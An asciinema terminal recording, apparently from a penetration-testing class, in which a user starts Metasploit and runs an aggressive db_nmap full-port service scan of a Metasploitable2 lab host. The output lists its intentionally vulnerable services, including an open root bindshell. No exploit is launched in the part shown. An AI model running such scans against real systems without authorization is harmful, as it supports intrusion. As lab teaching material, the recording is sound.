{"version": 2, "width": 121, "height": 31, "timestamp": 1727622732, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.097143, "o", "                                                                                                                         \r\r\u001b]0;kali@kali: ~/seance06\u0007"]
[0.138455, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mkali㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/seance06\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[0.138841, "o", "\u001b[?1h\u001b="]
[0.140026, "o", "\u001b[?2004h"]
[2.429867, "o", "\u001b[4ms\u001b[24m"]
[2.430678, "o", "\b\u001b[4ms\u001b[24m\u001b[38;2;153;153;153mudo msfconsole\u001b[39m\u001b[14D"]
[2.512846, "o", "\b\u001b[24m\u001b[36ms\u001b[36mu\u001b[39m"]
[2.624635, "o", "\b\b\u001b[39m\u001b[4ms\u001b[39m\u001b[4mu\u001b[39m\u001b[4md\u001b[24m"]
[2.674807, "o", "\b\b\b\u001b[4m\u001b[32ms\u001b[4m\u001b[32mu\u001b[4m\u001b[32md\u001b[4m\u001b[32mo\u001b[24m\u001b[39m"]
[2.825116, "o", "\u001b[39m "]
[3.867473, "o", "\u001b[36mm\u001b[36ms\u001b[36mf\u001b[36mc\u001b[36mo\u001b[36mn\u001b[36ms\u001b[36mo\u001b[36ml\u001b[36me\u001b[39m"]
[4.172862, "o", "\u001b[?1l\u001b>"]
[4.176665, "o", "\u001b[?2004l\r\r\n"]
[4.18757, "o", "[sudo] password for kali: "]
[8.617217, "o", "\r\n"]
[10.246468, "o", "Metasploit tip: Set the current module's RHOSTS with database values using \r\nhosts -R or services -R\r\n"]
[10.246844, "o", "[*] Starting the Metasploit Framework console.../\r"]
[10.347562, "o", "[*] Starting the Metasploit Framework console...-\r"]
[10.448796, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[10.554901, "o", "[*] starting the Metasploit Framework console...|\r"]
[10.65575, "o", "[*] STarting the Metasploit Framework console.../\r"]
[10.756728, "o", "[*] StArting the Metasploit Framework console...-\r"]
[11.038487, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[11.239106, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[11.439598, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[11.639827, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[11.840965, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[11.964274, "o", "[*] Starting the Metasploit Framework console...|\r"]
[12.065374, "o", "[*] Starting The Metasploit Framework console.../\r"]
[12.165382, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[12.265928, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[12.421491, "o", "[*] Starting the Metasploit Framework console...|\r"]
[12.557158, "o", "[*] Starting the metasploit Framework console.../\r"]
[12.659046, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[12.759411, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[12.861099, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[12.962034, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[13.063064, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[13.184785, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[13.28641, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[13.388679, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[13.492357, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[13.594267, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[13.695315, "o", "[*] Starting the Metasploit framework console...|\r"]
[13.797031, "o", "[*] Starting the Metasploit FRamework console.../\r"]
[13.903361, "o", "[*] Starting the Metasploit FrAmework console...-\r"]
[14.004426, "o", "[*] Starting the Metasploit FraMework console...\\\r"]
[14.107912, "o", "[*] Starting the Metasploit FramEwork console...|\r"]
[14.213519, "o", "[*] Starting the Metasploit FrameWork console.../\r"]
[14.315968, "o", "[*] Starting the Metasploit FramewOrk console...-\r"]
[14.416772, "o", "[*] Starting the Metasploit FramewoRk console...\\\r"]
[14.51799, "o", "[*] Starting the Metasploit FrameworK console...|\r"]
[14.620562, "o", "[*] Starting the Metasploit Framework console.../\r"]
[14.721463, "o", "[*] Starting the Metasploit Framework Console...-\r"]
[14.823536, "o", "[*] Starting the Metasploit Framework cOnsole...\\\r"]
[14.954764, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[15.098432, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[15.200008, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[15.301944, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[15.403845, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[15.504345, "o", "[*] Starting the Metasploit Framework console.../\r"]
[15.605204, "o", "[*] Starting the Metasploit Framework console...-\r"]
[15.705798, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[15.806498, "o", "[*] Starting the Metasploit Framework console...|\r"]
[15.907396, "o", "[*] Starting the Metasploit Framework console.../\r"]
[16.008169, "o", "[*] Starting the Metasploit Framework console...-\r"]
[16.108605, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[16.208891, "o", "[*] starting the Metasploit Framework console...|\r"]
[16.309478, "o", "[*] STarting the Metasploit Framework console.../\r"]
[16.423812, "o", "[*] StArting the Metasploit Framework console...-\r"]
[16.609898, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[16.911203, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[17.219225, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[17.413047, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[17.613398, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[17.914151, "o", "[*] Starting the Metasploit Framework console...|\r"]
[18.115128, "o", "[*] Starting The Metasploit Framework console.../\r"]
[18.515749, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[18.623958, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[18.817116, "o", "[*] Starting the Metasploit Framework console...|\r"]
[19.118177, "o", "[*] Starting the metasploit Framework console.../\r"]
[19.319988, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[19.519071, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[19.619816, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[19.920165, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[20.221122, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[20.421336, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[20.460925, "o", "\r                                                  \r\n"]
[20.462587, "o", "\u001b[0m"]
[20.476979, "o", "\u001b[36m\u001b[0m\u001b[37m\r\n  Metasploit Park, System Security Interface\r\n  Version 4.0.5, Alpha E\r\n  Ready...\r\n  > \u001b[1maccess security\u001b[0m\r\n  access: PERMISSION DENIED.\r\n  > \u001b[1maccess security grid\u001b[0m\r\n  access: PERMISSION DENIED.\r\n  > \u001b[1maccess main security grid\u001b[0m\r\n  access: PERMISSION DENIED....and...\r\n  \u001b[31mYOU DIDN'T SAY THE MAGIC WORD!\r\n  YOU DIDN'T SAY THE MAGIC WORD!\r\n  YOU DIDN'T SAY THE MAGIC WORD!\r\n  YOU DIDN'T SAY THE MAGIC WORD!\r\n  YOU DIDN'T SAY THE MAGIC WORD!\r\n  YOU DIDN'T SAY THE MAGIC WORD!\r\n  YOU DIDN'T SAY THE MAGIC WORD!\u001b[0m\r\n\u001b[0m\r\n\r\n       =[ \u001b[33mmetasploit v6.4.20-dev\u001b[0m                          ]\r\n+ -- --=[ 2440 exploits - 1256 auxiliary - 429 post       ]\r\n+ -- --=[ 1471 payloads - 47 encoders - 11 nops           ]\r\n+ -- --=[ 9 evasion                                       ]\r\n\r\nMetasploit Documentation: https://docs.metasploit.com/\r\n\r\n"]
[25.369089, "o", "\u001b[?1034h"]
[25.427699, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[286.678357, "o", "s"]
[286.712016, "o", "e"]
[286.784332, "o", "t"]
[286.892983, "o", " "]
[287.139271, "o", "V"]
[287.273053, "o", "E"]
[287.378179, "o", "R"]
[287.56258, "o", "B"]
[287.685841, "o", "O"]
[287.843493, "o", "S"]
[287.926411, "o", "E"]
[288.276213, "o", " "]
[288.439007, "o", "t"]
[288.572159, "o", "r"]
[288.698358, "o", "u"]
[288.78254, "o", "e"]
[289.286509, "o", "\r\r\n"]
[289.30382, "o", "\u001b[0m"]
[289.322203, "o", "VERBOSE => true\r\n"]
[289.394448, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[290.62532, "o", "d"]
[290.712541, "o", "b"]
[291.143534, "o", "_"]
[291.398705, "o", "n"]
[291.61511, "o", "m"]
[291.676824, "o", "a"]
[291.910211, "o", "p"]
[293.078292, "o", " "]
[298.874455, "o", "-"]
[299.145156, "o", "T"]
[300.181106, "o", "4"]
[300.489963, "o", " "]
[301.02747, "o", "-"]
[301.525412, "o", "P"]
[301.576891, "o", "A"]
[301.824307, "o", " "]
[302.249022, "o", "-"]
[302.418302, "o", "s"]
[302.821236, "o", "V"]
[303.36412, "o", " "]
[303.757184, "o", "-"]
[303.915691, "o", "-"]
[304.004768, "o", "v"]
[304.151578, "o", "e"]
[304.246361, "o", "r"]
[304.340319, "o", "s"]
[304.41875, "o", "i"]
[304.454521, "o", "o"]
[304.523601, "o", "n"]
[304.734871, "o", "-"]
[304.880518, "o", "a"]
[305.043488, "o", "l"]
[305.199593, "o", "l"]
[305.900839, "o", " "]
[307.266658, "o", "-"]
[307.654471, "o", "-"]
[308.167009, "o", "o"]
[308.345921, "o", "s"]
[308.647534, "o", "s"]
[308.865412, "o", "c"]
[308.933228, "o", "a"]
[309.096739, "o", "n"]
[309.318164, "o", "-"]
[309.585453, "o", "g"]
[309.68785, "o", "u"]
[309.84114, "o", "e"]
[310.109968, "o", "s"]
[310.302329, "o", "s"]
[311.877404, "o", " "]
[312.03711, "o", "-"]
[312.37722, "o", "A"]
[312.617055, "o", " "]
[312.986977, "o", "-"]
[313.203283, "o", "s"]
[313.543469, "o", "S"]
[314.011089, "o", " "]
[314.457428, "o", "-"]
[315.304612, "o", "p"]
[316.342102, "o", " "]
[316.753315, "o", "1"]
[317.026313, "o", "-"]
[317.938765, "o", "6"]
[318.136876, "o", "5"]
[318.3891, "o", "5"]
[318.867059, "o", "3"]
[319.105411, "o", "5"]
[320.40632, "o", " "]
[320.743127, "o", "m"]
[320.854666, "o", "s"]
[320.921193, "o", "f"]
[321.263336, "o", "2"]
[321.494127, "o", "."]
[321.622941, "o", "t"]
[321.711061, "o", "e"]
[321.884769, "o", "s"]
[322.035314, "o", "t"]
[323.85744, "o", "\r\r\n"]
[323.874897, "o", "\u001b[0m"]
[324.080664, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 11:17 EDT\r\n"]
[494.581139, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Stats: 0:02:50 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: NSE Timing: About 98.51% done; ETC: 11:20 (0:00:00 remaining)\r\n"]
[497.624253, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Stats: 0:02:53 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: NSE Timing: About 99.61% done; ETC: 11:20 (0:00:00 remaining)\r\n"]
[532.41318, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Stats: 0:03:28 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: NSE Timing: About 90.16% done; ETC: 11:21 (0:00:02 remaining)\r\n"]
[581.171314, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap scan report for msf2.test (192.168.3.20)\r\n"]
[581.188838, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host is up (0.017s latency).\r\n"]
[581.189329, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Not shown: 65505 closed tcp ports (reset)\r\n"]
[581.190574, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: PORT      STATE SERVICE     VERSION\r\n"]
[581.191106, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 21/tcp    open  ftp         vsftpd 2.3.4\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | ftp-syst:\r\n"]
[581.191673, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   STAT:\r\n"]
[581.192554, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | FTP server status:\r\n"]
[581.192992, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      Connected to 192.168.3.10\r\n"]
[581.193426, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      Logged in as ftp\r\n"]
[581.194823, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      TYPE: ASCII\r\n"]
[581.224854, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      No session bandwidth limit\r\n"]
[581.225426, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      Session timeout in seconds is 300\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      Control connection is plain text\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      Data connections will be plain text\r\n"]
[581.227413, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |      vsFTPd 2.3.4 - secure, fast, stable\r\n"]
[581.227974, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_End of status\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n"]
[581.228376, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)\r\n"]
[581.229784, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | ssh-hostkey:\r\n"]
[581.230315, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)\r\n"]
[581.231027, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 23/tcp    open  telnet      Linux telnetd\r\n"]
[581.232097, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 25/tcp    open  smtp        Postfix smtpd\r\n"]
[581.23252, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN\r\n"]
[581.2333, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 53/tcp    open  domain      ISC BIND 9.4.2\r\n"]
[581.233909, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | dns-nsid:\r\n"]
[581.235712, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  bind.version: 9.4.2\r\n"]
[581.236144, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)\r\n"]
[581.236316, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2\r\n"]
[581.237404, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_http-title: Metasploitable2 - Linux\r\n"]
[581.237913, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 111/tcp   open  rpcbind     2 (RPC #100000)\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | rpcinfo:\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   program version    port/proto  service\r\n"]
[581.239237, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100000  2            111/tcp   rpcbind\r\n"]
[581.239437, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100000  2            111/udp   rpcbind\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100003  2,3,4       2049/tcp   nfs\r\n"]
[581.239831, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100003  2,3,4       2049/udp   nfs\r\n"]
[581.240862, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100005  1,2,3      55208/udp   mountd\r\n"]
[581.241544, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100005  1,2,3      59079/tcp   mountd\r\n"]
[581.241933, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100021  1,3,4      33009/tcp   nlockmgr\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100021  1,3,4      46398/udp   nlockmgr\r\n"]
[581.242212, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   100024  1          37449/udp   status\r\n"]
[581.243088, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  100024  1          41391/tcp   status\r\n"]
[581.243959, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)\r\n"]
[581.245363, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)\r\n"]
[581.246764, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 512/tcp   open  exec        netkit-rsh rexecd\r\n"]
[581.2472, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 513/tcp   open  login?\r\n"]
[581.247649, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 514/tcp   open  shell       Netkit rshd\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1099/tcp  open  java-rmi    GNU Classpath grmiregistry\r\n"]
[581.248946, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1524/tcp  open  bindshell   Metasploitable root shell\r\n"]
[581.249349, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 2049/tcp  open  nfs         2-4 (RPC #100003)\r\n"]
[581.250031, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 2121/tcp  open  ftp         ProFTPD 1.3.1\r\n"]
[581.250393, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5\r\n"]
[581.251763, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | mysql-info:\r\n"]
[581.252465, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Protocol: 10\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Version: 5.0.51a-3ubuntu5\r\n"]
[581.252932, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Thread ID: 18\r\n"]
[581.254021, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Capabilities flags: 43564\r\n"]
[581.254479, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Some Capabilities: Support41Auth, LongColumnFlag, ConnectWithDatabase, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, Speaks41ProtocolNew\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Status: Autocommit\r\n"]
[581.25487, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  Salt: ucq./B>OQ+\"dVbg`-]o4\r\n"]
[581.256221, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))\r\n"]
[581.256319, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7\r\n"]
[581.256529, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_ssl-date: 2024-09-26T03:53:17+00:00; -3d11h28m36s from scanner time.\r\n"]
[581.257625, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX\r\n"]
[581.257836, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | Not valid before: 2010-03-17T14:07:45\r\n"]
[581.25825, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_Not valid after:  2010-04-16T14:07:45\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 5900/tcp  open  vnc         VNC (protocol 3.3)\r\n"]
[581.259928, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | vnc-info:\r\n"]
[581.260035, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Protocol version: 3.3\r\n"]
[581.260343, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Security types:\r\n"]
[581.260754, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_    VNC Authentication (2)\r\n"]
[581.26192, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 6000/tcp  open  X11         (access denied)\r\n"]
[581.262209, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 6667/tcp  open  irc         UnrealIRCd\r\n"]
[581.262678, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 6697/tcp  open  irc         UnrealIRCd\r\n"]
[581.262875, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)\r\n"]
[581.264929, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_ajp-methods: Failed to get a valid response for the OPTION request\r\n"]
[581.265667, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1\r\n"]
[581.266103, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_http-title: Apache Tomcat/5.5\r\n"]
[581.267017, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_http-favicon: Apache Tomcat\r\n"]
[581.26839, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)\r\n"]
[581.269031, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 33009/tcp open  nlockmgr    1-4 (RPC #100021)\r\n"]
[581.269783, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 41391/tcp open  status      1 (RPC #100024)\r\n"]
[581.270164, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 57761/tcp open  java-rmi    GNU Classpath grmiregistry\r\n"]
[581.27092, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 59079/tcp open  mountd      1-3 (RPC #100005)\r\n"]
[581.27155, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: MAC Address: 00:15:5D:02:19:06 (Microsoft)\r\n"]
[581.272452, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Device type: general purpose\r\n"]
[581.273266, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Running: Linux 2.6.X\r\n"]
[581.27378, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS CPE: cpe:/o:linux:linux_kernel:2.6\r\n"]
[581.27413, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS details: Linux 2.6.9 - 2.6.33\r\n"]
[581.274513, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Network Distance: 1 hop\r\n"]
[581.27525, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel\r\n"]
[581.276023, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Host script results:\r\n"]
[581.276146, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_smb2-time: Protocol negotiation failed (SMB2)\r\n"]
[581.276542, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_clock-skew: mean: -3d10h08m35s, deviation: 2h18m34s, median: -3d11h28m36s\r\n"]
[581.276969, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)\r\n"]
[581.277746, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb-security-mode:\r\n"]
[581.278231, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   account_used: <blank>\r\n\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   authentication_level: user\r\n"]
[581.278969, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   challenge_response: supported\r\n"]
[581.279326, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  message_signing: disabled (dangerous, but default)\r\n"]
[581.280197, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: | smb-os-discovery:\r\n"]
[581.28054, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   OS: Unix (Samba 3.0.20-Debian)\r\n"]
[581.281111, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Computer name: metasploitable\r\n"]
[581.281661, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   NetBIOS computer name:\r\n"]
[581.282132, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   Domain name: localdomain\r\n"]
[581.282474, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |   FQDN: metasploitable.localdomain\r\n"]
[581.282787, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: |_  System time: 2024-09-25T23:51:47-04:00\r\n"]
[581.283913, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: TRACEROUTE\r\n"]
[581.284157, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: HOP RTT      ADDRESS\r\n"]
[581.284732, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: 1   16.86 ms msf2.test (192.168.3.20)\r\n"]
[581.28503, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .\r\n"]
[581.286188, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Nmap: Nmap done: 1 IP address (1 host up) scanned in 257.28 seconds\r\n"]
[583.555183, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[644.967381, "o", "c"]
[645.043807, "o", "o"]
[645.109684, "o", "u"]
[645.193951, "o", "c"]
[645.285824, "o", "o"]
[645.324368, "o", "u"]
[645.79869, "o", " "]
[645.921358, "o", "c"]
[646.05005, "o", "u"]
[646.228821, "o", "t"]
[646.780803, "o", " "]
[646.957107, "o", "h"]
[647.065065, "o", "e"]
[647.348139, "o", "\b\u001b[K"]
[647.589087, "o", "\b\u001b[K"]
[647.622795, "o", "\b\u001b[K"]
[647.651395, "o", "\b\u001b[K"]
[647.799851, "o", "\b\u001b[K"]
[647.968832, "o", "\b\u001b[K"]
[648.123013, "o", "\b\u001b[K"]
[648.537874, "o", "\r\r\n"]
[648.557186, "o", "\u001b[0m"]
[648.560672, "o", "\u001b[1m\u001b[31m[-]\u001b[0m Unknown command: coucou. Run the \u001b[32mhelp\u001b[0m command for more details.\r\n"]
[648.650477, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[662.222663, "o", "d"]
[662.268235, "o", "b"]
[662.610269, "o", " "]
[662.711176, "o", "s"]
[662.992402, "o", "\b\u001b[K"]
[663.119118, "o", "\b\u001b[K"]
[663.356956, "o", "_"]
[663.58184, "o", "s"]
[663.655277, "o", "t"]
[663.749445, "o", "a"]
[663.851082, "o", "t"]
[663.96225, "o", "u"]
[664.035008, "o", "s"]
[664.287089, "o", "\r\r\n"]
[664.306333, "o", "\u001b[0m"]
[664.320518, "o", "\u001b[1m\u001b[34m[*]\u001b[0m Connected to msf. Connection type: postgresql.\r\n"]
[664.406718, "o", "\u001b[4mmsf6\u001b[0m \u001b[0m> "]
[671.015168, "o", "s"]
[671.056121, "o", "e"]
[671.129804, "o", "r"]
[671.334858, "o", "v"]
[671.480023, "o", "i"]
[671.56979, "o", "c"]
[671.702873, "o", "e"]
[671.881582, "o", "s"]
[672.871897, "o", "\r\r\n"]
[672.892452, "o", "\u001b[0m"]
